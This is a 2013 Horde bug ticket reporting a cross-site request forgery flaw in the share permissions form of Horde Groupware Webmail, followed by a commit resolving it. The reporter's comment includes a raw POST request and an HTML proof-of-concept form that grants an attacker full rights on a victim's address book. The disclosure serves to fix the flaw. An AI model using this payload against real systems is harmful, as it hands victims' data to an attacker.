Tickets :: [#12804] CSRF in changing permissions functionality

unknown

5/20/25

Summary	CSRF in changing permissions functionality
Queue	Horde Groupware Webmail Edition
Queue Version	5.1.2
Type	Bug
State	Resolved
Priority	3. High
Owners	jan (at) horde (dot) org
Requester	m.benetrix (at) e-secure (dot) com (dot) au
Created	10/28/2013 (4222 days ago)
Due	11/05/2013 (4214 days ago)
Updated	10/29/2013 (4221 days ago)
Assigned
Resolved	10/29/2013 (4221 days ago)
Milestone
Patch	No

10/29/2013 11:36:03 AM	Jan Schneider	Assigned to Jan Schneider State ⇒ Resolved

10/29/2013 11:36:01 AM	Git Commit	Comment #2	Reply to this comment
Changes have been made in Git (master): commit b79114d08ee8c8e43e74a179741749529f6d885c Author: Jan Schneider <jan@horde.org> Date: Tue Oct 29 12:32:30 2013 +0100 [jan] SECURITY: Protect against CSRF attacks on share permissions form (~~Bug #12804~~). horde/docs/CHANGES \| 2 ++ horde/package.xml \| 4 +++- horde/services/shares/edit.php \| 5 +++++ horde/templates/shares/edit.inc \| 1 + kronolith/docs/CHANGES \| 2 ++ kronolith/package.xml \| 2 ++ kronolith/perms.php \| 5 +++++ kronolith/templates/perms/perms.inc \| 1 + 8 files changed, 21 insertions(+), 1 deletions(-) http://git.horde.org/horde-git/-/commit/b79114d08ee8c8e43e74a179741749529f6d885c

10/28/2013 11:18:33 PM	m (dot) benetrix (at) e-secure (dot) com (dot) au	Comment #1 Priority ⇒ 3. High Patch ⇒ No Milestone ⇒ Queue ⇒ Horde Groupware Webmail Edition Due ⇒ 11/05/2013 Summary ⇒ CSRF in changing permissions functionality Type ⇒ Bug State ⇒ Unconfirmed	Reply to this comment
I found another one, a CSRF while a change of permissions is requested. It was found that this form misses a unique token Request: POST /horde/services/shares/edit.php HTTP/1.1 Host: victim.com User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: session=a0db6c30e697fe3da03f9f437a63bb3f Content-Type: application/x-www-form-urlencoded Content-Length: 252 actionID=editform&cid=37&app=turba&owner_input=kenedyK&u_names%5B%7C%7Cnew_input%5D=AttackerUserName&u_read%5B%7C%7Cnew_input%5D=on&u_edit%5B%7C%7Cnew_input%5D=on&u_delete%5B%7C%7Cnew_input%5D=on&g_names%5B%7C%7Cnew%5D=&save_and_finish=Save+and+Finish PoC <html> <body> <!--a75c305b1c0a6022--><form action="www.victim.com/horde/services/shares/edit.php" method="POST"> <input type="hidden" name="actionID" value="editform" /> <input type="hidden" name="cid" value="37" /> <input type="hidden" name="app" value="turba" /> <input type="hidden" name="owner_input" value="kenedyK" /> <input type="hidden" name="u_names[\|\|new_input]" value="AttackerUserName" /> <input type="hidden" name="u_read[\|\|new_input]" value="on" /> <input type="hidden" name="u_edit[\|\|new_input]" value="on" /> <input type="hidden" name="u_delete[\|\|new_input]" value="on" /> <input type="hidden" name="g_names[\|\|new]" value="" /> <input type="hidden" name="save_and_finish" value="Save and Finish" /> <input type="submit" value="Submit request" /> </form> </body> </html> Conditions: The attacker must know the owner value which is the victim's username, and the ID of the address book. Once he gets them, he can launch the attack.